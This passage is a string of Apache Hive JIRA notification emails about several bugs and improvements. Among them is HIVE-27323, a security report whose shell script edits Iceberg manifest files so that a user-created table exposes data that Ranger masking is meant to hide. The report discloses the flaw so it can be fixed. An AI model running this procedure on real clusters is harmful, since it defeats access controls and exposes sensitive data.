org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.checkAndConvertSMBJoin(ConvertJoinMapJoin.java:371) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.optimizer.ConvertJoinMapJoin.process(ConvertJoinMapJoin.java:151) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.lib.DefaultRuleDispatcher.dispatch(DefaultRuleDispatcher.java:90) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.lib.DefaultGraphWalker.dispatchAndReturn(DefaultGraphWalker.java:105) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.lib.DefaultGraphWalker.dispatch(DefaultGraphWalker.java:89) > ~[hive-exec-100.jar:?] > at > org.apache.hadoop.hive.ql.lib.ForwardWalker.walk(ForwardWalker.java:74) > ~[hive-exec-100.jar:?] > at >
[jira] [Assigned] (HIVE-26505) Case When Some result data is lost when there are common column conditions and partitioned column conditions
[ https://issues.apache.org/jira/browse/HIVE-26505?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Krisztian Kasa reassigned HIVE-26505: - Assignee: Krisztian Kasa > Case When Some result data is lost when there are common column conditions > and partitioned column conditions > - > > Key: HIVE-26505 > URL: https://issues.apache.org/jira/browse/HIVE-26505 > Project: Hive > Issue Type: Bug > Components: Hive >Affects Versions: 3.1.0, 4.0.0-alpha-1 >Reporter: GuangMing Lu >Assignee: Krisztian Kasa >Priority: Critical > Labels: check, hive-4.0.0-must > > {code:java}https://issues.apache.org/jira/browse/HIVE-26505# > create table test0831 (id string) partitioned by (cp string); > insert into test0831 values ('a', '2022-08-23'),('c', '2022-08-23'),('d', > '2022-08-23'); > insert into test0831 values ('a', '2022-08-24'),('b', '2022-08-24'); > select * from test0831; > +-+--+ > | test0831.id | test0831.cp | > +-+--+ > | a | 2022-08-23 | > | b | 2022-08-23 | > | a | 2022-08-23 | > | c | 2022-08-24 | > | d | 2022-08-24 | > +-+--+ > select * from test0831 where (case when id='a' and cp='2022-08-23' then 1 > else 0 end)=0; > +--+--+ > | test0830.id | test0830.cp | > +--+--+ > | a | 2022-08-24 | > | b | 2022-08-24 | > +--+--+ > {code} > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27269) VectorizedMapJoin returns wrong result for TPC-DS query 97
[ https://issues.apache.org/jira/browse/HIVE-27269?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791618#comment-17791618 ] Denys Kuzmenko commented on HIVE-27269: --- Merged to master. [~seonggon], thank you for the patch! > VectorizedMapJoin returns wrong result for TPC-DS query 97 > -- > > Key: HIVE-27269 > URL: https://issues.apache.org/jira/browse/HIVE-27269 > Project: Hive > Issue Type: Sub-task >Reporter: Seonggon Namgung >Assignee: Seonggon Namgung >Priority: Critical > Labels: hive-4.0.0-must, pull-request-available > > TPC-DS query 97 returns wrong results when hive.auto.convert.join and > hive.vectorized.execution.enabled are set to true. > > Result of query 97 on 1TB text dataset: > CommonMergeJoinOperator(hive.auto.convert.join=false): 534151529, > 284185{*}746{*}, 84163 > MapJoinOperator(hive.auto.convert.join=true, > hive.vectorized.execution.enabled=false): 534151529, 284185{*}746{*}, 84163 > VectorMapJoinOperator(hive.auto.convert.join=true, > hive.vectorized.execution.enabled=true): 534151529, 284185{*}388{*}, 84163 > > Also I observed that VectorizedMapJoin returns different results for 100GB > dataset when I run query 97 twice, but I could not reproduce it since then. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27269) VectorizedMapJoin returns wrong result for TPC-DS query 97
[ https://issues.apache.org/jira/browse/HIVE-27269?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27269: -- Fix Version/s: 4.0.0 Resolution: Fixed Status: Resolved (was: Patch Available) > VectorizedMapJoin returns wrong result for TPC-DS query 97 > -- > > Key: HIVE-27269 > URL: https://issues.apache.org/jira/browse/HIVE-27269 > Project: Hive > Issue Type: Sub-task >Reporter: Seonggon Namgung >Assignee: Seonggon Namgung >Priority: Critical > Labels: hive-4.0.0-must, pull-request-available > Fix For: 4.0.0 > > > TPC-DS query 97 returns wrong results when hive.auto.convert.join and > hive.vectorized.execution.enabled are set to true. > > Result of query 97 on 1TB text dataset: > CommonMergeJoinOperator(hive.auto.convert.join=false): 534151529, > 284185{*}746{*}, 84163 > MapJoinOperator(hive.auto.convert.join=true, > hive.vectorized.execution.enabled=false): 534151529, 284185{*}746{*}, 84163 > VectorMapJoinOperator(hive.auto.convert.join=true, > hive.vectorized.execution.enabled=true): 534151529, 284185{*}388{*}, 84163 > > Also I observed that VectorizedMapJoin returns different results for 100GB > dataset when I run query 97 twice, but I could not reproduce it since then. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27506) Migrate to ProtobufRpcEngine2
[ https://issues.apache.org/jira/browse/HIVE-27506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791603#comment-17791603 ] Ayush Saxena commented on HIVE-27506: - [~kanaka] I don't think that is anywhere in the plan, I think to use ProtobufRpcEngine2 we need the thirdpaty-protobuf as well, so I don't think that is happening anytime soon > Migrate to ProtobufRpcEngine2 > - > > Key: HIVE-27506 > URL: https://issues.apache.org/jira/browse/HIVE-27506 > Project: Hive > Issue Type: Task > Components: llap >Reporter: Ashok Kumar >Priority: Major > > Hadoop has moved over from protobu 2.5.0 to hadoop shaded protobuf. > It has created > [ProtobufRpcEngine2|https://github.com/apache/hadoop/blob/release-3.3.4-RC1/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/ipc/ProtobufRpcEngine2.java] > for this purpose. > Hive llap still uses > [ProtobufRpcEngine|https://github.com/apache/hadoop/blob/release-3.3.4-RC1/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/ipc/ProtobufRpcEngine.java] > which is meant for protobuf 2.5.0 e.g > [Ref#|https://github.com/apache/hive/blob/bd02abc9eba3aa0cd3701b26d9169130551a12ef/llap-common/src/java/org/apache/hadoop/hive/llap/LlapUtil.java#L267] > This Jira is to update Hive llap codebase to use ProtobufRpcEngine2 -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27323) Iceberg: malformed manifest file or list can cause data breach
[ https://issues.apache.org/jira/browse/HIVE-27323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated HIVE-27323: -- Labels: check pull-request-available (was: check) > Iceberg: malformed manifest file or list can cause data breach > -- > > Key: HIVE-27323 > URL: https://issues.apache.org/jira/browse/HIVE-27323 > Project: Hive > Issue Type: Bug > Components: Iceberg integration >Affects Versions: 4.0.0-alpha-2 >Reporter: Janos Kovacs >Priority: Blocker > Labels: check, pull-request-available > > Set to bug/blocker instead of enhancement due to its security related nature, > Hive4 should not be released w/o fix for this. Please reset if needed. > > Fyi: it's similar to HIVE-27322 but this is more based on Iceberg's internals > and can't just be fixed via the storagehandler authorizer. > > Context: > * There are some core tables with sensitive data that users can only query > with data masking enforced (e.g. via Ranger). Let's assume this is the > `default.icebergsecured` table. > * An end-user can only access the masked form of the sensitive data as > expected... > * The users also have privilege to create new tables in their own sandbox > databases - let's assume this is the `default.trojanhorse` table for now. > * The user can create a malicious table that exposes the sensitive data > non-masked leading to a possible data breach. > * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user > direct file-system access needs > Repro: > * First make sure the data is secured by the masking policy: > {noformat} > > beeline -e " > DROP TABLE IF EXISTS default.icebergsecured PURGE; > CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) > STORED BY ICEBERG; > INSERT INTO default.icebergsecured VALUES ('You might be allowed to see > this.','You are NOT allowed to see this!'); > " > > beeline -e " > SELECT * FROM default.icebergsecured; > " > +++ > | icebergsecured.txt | icebergsecured.secret | > +++ > | You might be allowed to see this. | MASKED BY RANGER FOR SECURITY | > +++ > {noformat} > * Now let the user to create the malicious table exposing the sensitive data: > {noformat} > > beeline -e " > DROP TABLE IF EXISTS default.trojanhorseviadata; > CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) > STORED BY ICEBERG > LOCATION '/some-user-writeable-location/trojanhorseviadata'; > INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder'); > " > SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" > beeline --outputformat=csv2 --showHeader=false --verbose=false > --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM > default.icebergsecured.files;" 2>/dev/null) > TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" > beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null > |grep metadata_location |grep -v previous_metadata_location | awk '{print > $5}') > TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep > "manifest-list" |cut -f4 -d\") > hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION > TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION) > TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq > '.manifest_path' |tr -d \") > hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION > TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION) > mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig > avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp > "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json > avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > > ${TROJAN_MANIFESTFILE}.schema > avro-tools fromjson --codec deflate --schema-file > ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > > ${TROJAN_MANIFESTFILE}.new > hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION > beeline -e "SELECT * FROM default.trojanhorseviadata;" > ++---+ > | trojanhorseviadata.txt | trojanhorseviadata.secret | > ++---+ > | You might be allowed to see this. | You are not allowed to see this! | > ++---+ > {noformat} > > There are actually multiple options to create such table and modify the > manifest/list like
[jira] [Resolved] (HIVE-27633) HMS: MTable to Table process reduces view related SQL
[ https://issues.apache.org/jira/browse/HIVE-27633?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko resolved HIVE-27633. --- Fix Version/s: 4.0.0 Resolution: Fixed > HMS: MTable to Table process reduces view related SQL > - > > Key: HIVE-27633 > URL: https://issues.apache.org/jira/browse/HIVE-27633 > Project: Hive > Issue Type: Improvement > Components: Metastore >Reporter: dzcxzl >Assignee: dzcxzl >Priority: Minor > Labels: pull-request-available > Fix For: 4.0.0 > > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27633) HMS: MTable to Table process reduces view related SQL
[ https://issues.apache.org/jira/browse/HIVE-27633?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791569#comment-17791569 ] Denys Kuzmenko commented on HIVE-27633: --- Merged to master. thanks for the patch [~dzcxzl], and [~zhangbutao] for the review! > HMS: MTable to Table process reduces view related SQL > - > > Key: HIVE-27633 > URL: https://issues.apache.org/jira/browse/HIVE-27633 > Project: Hive > Issue Type: Improvement > Components: Metastore >Reporter: dzcxzl >Assignee: dzcxzl >Priority: Minor > Labels: pull-request-available > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE
[ https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791561#comment-17791561 ] Butao Zhang commented on HIVE-27712: This problem is somewhat similar to that one https://issues.apache.org/jira/browse/HIVE-22633, which maybe be fixed by https://issues.apache.org/jira/browse/HIVE-23530 Could you please try this patch HIVE-23530? > GenericUDAFNumericStatsEvaluator throws NPE > --- > > Key: HIVE-27712 > URL: https://issues.apache.org/jira/browse/HIVE-27712 > Project: Hive > Issue Type: Bug >Reporter: liang yu >Assignee: liang yu >Priority: Major > Labels: pull-request-available > Attachments: image-2023-09-19-16-33-49-881.png > > > using Hadoop 3.3.4 > Hive 3.1.3 > when I set the config: > {code:java} > set hive.groupby.skewindata=true; > set hive.map.aggr=true; {code} > and execute a sql with groupby execution and join execution, I got a > NullPointerException below: > > !image-2023-09-19-16-33-49-881.png! -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Resolved] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties
[ https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Ayush Saxena resolved HIVE-27903. - Fix Version/s: 4.0.0 Resolution: Fixed > Iceberg: Implement Expire Snapshot with default table properties > > > Key: HIVE-27903 > URL: https://issues.apache.org/jira/browse/HIVE-27903 > Project: Hive > Issue Type: Improvement > Components: Hive >Affects Versions: 4.0.0-alpha-2 >Reporter: JK Pasimuthu >Assignee: Ayush Saxena >Priority: Major > Labels: pull-request-available > Fix For: 4.0.0 > > > [https://github.com/apache/iceberg/issues/9123] > The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while > expiring snapshots. > # > CREATE TABLE IF NOT EXISTS test5d78b6 ( > id INT, random1 STRING > ) > PARTITIONED BY (random2 STRING) > STORED BY ICEBERG > TBLPROPERTIES ( > 'write.format.default'='orc', > 'format-version'='2', > 'write.orc.compression-codec'='none' > ) > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SLEEP for 30 seconds > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 > 13:23:54.455')) * 1000; > # ALTER TABLE test5d78b6 SET > tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed > time in ms from the second insert and current time > # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10'); > # SELECT COUNT FROM default.test5d78b6.snapshots; > output: 1. it should be 2 rows. The default 1 is retained an all snapshots > are expired as usual, so setting the property has no effect. > Additional Info: the default value for 'history.expire.max-snapshot-age-ms' > is 5 days per this link: > [https://iceberg.apache.org/docs/1.3.1/configuration/] > Now while writing the tests and running them, the expiring snapshots just > worked fine within few seconds of the snapshots being created. > So, I'm assuming that this option doesn't have any effect right now. Having > said that, I'm thinking the implications on end user will have if we fix this. > The end user may not know about this option at all and will have tough time > figuring out why the snapshots are not getting expired. One option could be > to set the default to 0ms. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties
[ https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Ayush Saxena updated HIVE-27903: Summary: Iceberg: Implement Expire Snapshot with default table properties (was: TBLPROPERTIES('history.expire.max-snapshot-age-ms') doesn't work) > Iceberg: Implement Expire Snapshot with default table properties > > > Key: HIVE-27903 > URL: https://issues.apache.org/jira/browse/HIVE-27903 > Project: Hive > Issue Type: Improvement > Components: Hive >Affects Versions: 4.0.0-alpha-2 >Reporter: JK Pasimuthu >Assignee: Ayush Saxena >Priority: Major > Labels: pull-request-available > > [https://github.com/apache/iceberg/issues/9123] > The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while > expiring snapshots. > # > CREATE TABLE IF NOT EXISTS test5d78b6 ( > id INT, random1 STRING > ) > PARTITIONED BY (random2 STRING) > STORED BY ICEBERG > TBLPROPERTIES ( > 'write.format.default'='orc', > 'format-version'='2', > 'write.orc.compression-codec'='none' > ) > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SLEEP for 30 seconds > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 > 13:23:54.455')) * 1000; > # ALTER TABLE test5d78b6 SET > tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed > time in ms from the second insert and current time > # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10'); > # SELECT COUNT FROM default.test5d78b6.snapshots; > output: 1. it should be 2 rows. The default 1 is retained an all snapshots > are expired as usual, so setting the property has no effect. > Additional Info: the default value for 'history.expire.max-snapshot-age-ms' > is 5 days per this link: > [https://iceberg.apache.org/docs/1.3.1/configuration/] > Now while writing the tests and running them, the expiring snapshots just > worked fine within few seconds of the snapshots being created. > So, I'm assuming that this option doesn't have any effect right now. Having > said that, I'm thinking the implications on end user will have if we fix this. > The end user may not know about this option at all and will have tough time > figuring out why the snapshots are not getting expired. One option could be > to set the default to 0ms. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties
[ https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791550#comment-17791550 ] Ayush Saxena commented on HIVE-27903: - Committed to master. Thanx [~jkcldr] for the report & [~zhangbutao] for the review!!! > Iceberg: Implement Expire Snapshot with default table properties > > > Key: HIVE-27903 > URL: https://issues.apache.org/jira/browse/HIVE-27903 > Project: Hive > Issue Type: Improvement > Components: Hive >Affects Versions: 4.0.0-alpha-2 >Reporter: JK Pasimuthu >Assignee: Ayush Saxena >Priority: Major > Labels: pull-request-available > > [https://github.com/apache/iceberg/issues/9123] > The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while > expiring snapshots. > # > CREATE TABLE IF NOT EXISTS test5d78b6 ( > id INT, random1 STRING > ) > PARTITIONED BY (random2 STRING) > STORED BY ICEBERG > TBLPROPERTIES ( > 'write.format.default'='orc', > 'format-version'='2', > 'write.orc.compression-codec'='none' > ) > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SLEEP for 30 seconds > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 > 13:23:54.455')) * 1000; > # ALTER TABLE test5d78b6 SET > tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed > time in ms from the second insert and current time > # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10'); > # SELECT COUNT FROM default.test5d78b6.snapshots; > output: 1. it should be 2 rows. The default 1 is retained an all snapshots > are expired as usual, so setting the property has no effect. > Additional Info: the default value for 'history.expire.max-snapshot-age-ms' > is 5 days per this link: > [https://iceberg.apache.org/docs/1.3.1/configuration/] > Now while writing the tests and running them, the expiring snapshots just > worked fine within few seconds of the snapshots being created. > So, I'm assuming that this option doesn't have any effect right now. Having > said that, I'm thinking the implications on end user will have if we fix this. > The end user may not know about this option at all and will have tough time > figuring out why the snapshots are not getting expired. One option could be > to set the default to 0ms. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE
[ https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791523#comment-17791523 ] liang yu commented on HIVE-27712: - Solution: add an check to verify if variable _'minFieldOI'_ and _'maxFieldOI'_ is null, if null,call _getValueObjectInspector with no arguments._ > GenericUDAFNumericStatsEvaluator throws NPE > --- > > Key: HIVE-27712 > URL: https://issues.apache.org/jira/browse/HIVE-27712 > Project: Hive > Issue Type: Bug >Reporter: liang yu >Assignee: liang yu >Priority: Major > Labels: pull-request-available > Attachments: image-2023-09-19-16-33-49-881.png > > > using Hadoop 3.3.4 > Hive 3.1.3 > when I set the config: > {code:java} > set hive.groupby.skewindata=true; > set hive.map.aggr=true; {code} > and execute a sql with groupby execution and join execution, I got a > NullPointerException below: > > !image-2023-09-19-16-33-49-881.png! -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE
[ https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated HIVE-27712: -- Labels: pull-request-available (was: ) > GenericUDAFNumericStatsEvaluator throws NPE > --- > > Key: HIVE-27712 > URL: https://issues.apache.org/jira/browse/HIVE-27712 > Project: Hive > Issue Type: Bug >Reporter: liang yu >Assignee: liang yu >Priority: Major > Labels: pull-request-available > Attachments: image-2023-09-19-16-33-49-881.png > > > using Hadoop 3.3.4 > Hive 3.1.3 > when I set the config: > {code:java} > set hive.groupby.skewindata=true; > set hive.map.aggr=true; {code} > and execute a sql with groupby execution and join execution, I got a > NullPointerException below: > > !image-2023-09-19-16-33-49-881.png! -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Assigned] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE
[ https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] liang yu reassigned HIVE-27712: --- Assignee: liang yu > GenericUDAFNumericStatsEvaluator throws NPE > --- > > Key: HIVE-27712 > URL: https://issues.apache.org/jira/browse/HIVE-27712 > Project: Hive > Issue Type: Bug >Reporter: liang yu >Assignee: liang yu >Priority: Major > Attachments: image-2023-09-19-16-33-49-881.png > > > using Hadoop 3.3.4 > Hive 3.1.3 > when I set the config: > {code:java} > set hive.groupby.skewindata=true; > set hive.map.aggr=true; {code} > and execute a sql with groupby execution and join execution, I got a > NullPointerException below: > > !image-2023-09-19-16-33-49-881.png! -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27918) Iceberg: Push transforms for clustering during table writes
[ https://issues.apache.org/jira/browse/HIVE-27918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated HIVE-27918: -- Labels: pull-request-available (was: ) > Iceberg: Push transforms for clustering during table writes > --- > > Key: HIVE-27918 > URL: https://issues.apache.org/jira/browse/HIVE-27918 > Project: Hive > Issue Type: Improvement >Reporter: Sourabh Badhya >Assignee: Sourabh Badhya >Priority: Major > Labels: pull-request-available > > Currently transformed columns (except for bucket transform) are not pushed / > passed as clustering columns. This can lead to incorrect clustering on such > columns which can lead non-performant writes. > Hence push transforms for clustering during table writes. -- This message was sent by Atlassian Jira (v8.20.10#820010)